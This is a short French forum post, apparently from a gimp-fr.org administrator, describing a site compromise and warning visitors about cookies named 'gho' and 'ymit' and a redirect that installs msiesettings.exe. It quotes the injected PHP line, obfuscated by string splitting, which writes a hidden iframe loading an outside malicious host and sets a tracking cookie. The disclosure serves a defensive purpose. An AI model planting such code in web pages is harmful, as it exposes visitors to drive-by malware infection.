J'ai bien trouvé une ligne ajoutée dans un de mes fichiers :
Code:
if (!isset($_COOKIE["gho"])) echo '<ifra'.'me src=http:/'.'/google'.'rank.info/cou'.'nter style=display:none></ifra'.'me> <script '.'la'.'ngu'.'age'.'="JavaScript" type="tex'.'t/javascript"'.'>d'.'oc'.'umen'.'t.c'.'ookie = "gho=7;expire'.'s=Sun, 01-Dec-2009'.' 08:00:00 GMT;path'.'=/";</script>';
Puis une 2ème.
Celles-ci ont déposé deux cookies dans le navigateur que vous devez effacer.
Les cookies sont classés dans gimp-fr.org et nommés
ymit et
gho.
Ensuite la victime est redirigée vers le site
http://msiesettings.com/... (qui prétend être indisponible mais ne l'est pas) et active le malware msiesettings.exe
@+